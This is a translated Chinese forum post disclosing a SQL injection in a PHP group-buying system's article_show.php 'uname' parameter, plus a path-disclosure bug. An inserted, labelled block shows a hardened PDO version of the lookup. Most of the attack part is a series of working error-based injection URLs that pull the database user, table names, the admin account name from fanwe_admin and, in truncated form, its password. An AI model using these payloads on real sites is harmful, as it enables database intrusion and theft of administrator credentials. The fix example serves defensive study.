Source: 自学PHP网 | Date: 2015-04-15 15:00
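I used to use this group-buying system when it was free; I don't know why, but it now seems to have started charging.
This vulnerability has also been present all along in several of the older versions!
Vulnerable file: app/source/article_show.php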
<?php
if ($_REQUEST['m'] == 'Article' && $_REQUEST['a'] == 'showByUname') {
    $uname = $_REQUEST['uname']; // no filtering
    if ($uname != '') {
        $uname = rawurldecode($uname); // not affected by GPC
..........remaining code omitted
Such an obvious injection, and it has survived N versions...
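A hardened form of the lookup above, as an added example that is not part of the original post or of the system's own code: it keeps the rawurldecode() step, validates the decoded value, and passes it as a bound parameter. The table and column names, find_articles_by_uname(), the name policy, and the in-memory SQLite database (standing in for MySQL; needs pdo_sqlite) are assumptions.

```php
<?php
// Added example, not the vendor's code. Table/column names and
// find_articles_by_uname() are hypothetical; SQLite in memory stands in for MySQL.

function find_articles_by_uname(PDO $db, string $rawUname): array
{
    // Same decoding step as article_show.php. It runs after PHP's own URL
    // decoding (and after magic_quotes_gpc on old PHP), so %2527 on the wire
    // arrives here as %27 and becomes a bare ' that GPC never saw.
    $uname = rawurldecode($rawUname);

    // Validate the decoded value, not the raw one. Assumed policy: 1-32
    // letters, digits, underscore, hyphen or apostrophe.
    if (!preg_match('/\A[\p{L}\p{N}_\'-]{1,32}\z/u', $uname)) {
        return [];
    }

    // Bound parameter: the value never becomes part of the SQL text,
    // so an apostrophe in it is just data.
    $stmt = $db->prepare('SELECT id, title FROM article WHERE uname = :uname');
    $stmt->execute([':uname' => $uname]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, uname TEXT)');
$db->exec("INSERT INTO article (title, uname) VALUES ('About us', 'about'), ('FAQ', 'o''brien')");

// Constructed inputs, as PHP hands them over after decoding the query string once.
$inputs = [
    'about',            // ordinary name
    'o%27brien',        // double-encoded apostrophe, accepted and bound as data
    'about%27 or 1=1',  // quote followed by SQL text, rejected by validation
];
foreach ($inputs as $in) {
    printf("%-18s => %d row(s)\n", $in, count(find_articles_by_uname($db, $in)));
}
```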
There is also a path-disclosure vulnerability: mapi/comm.php
exp:
http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%2527or%201=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2523
Get the first table name, mainly for the prefix:
http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20table_name%20from+information_schema.columns+where+table_schema%3Ddatabase%28%29%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
Get the account name:
http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20from%20%28select%20count%28*%29%2Cconcat%28floor%28rand%280%29*2%29%2C%28select%20adm_name%20from%20fanwe_admin%20limit%200%2C1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%2
Get the password; the value has to be truncated here, and I don't know why either:
http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%201%3D%28select%201%20fr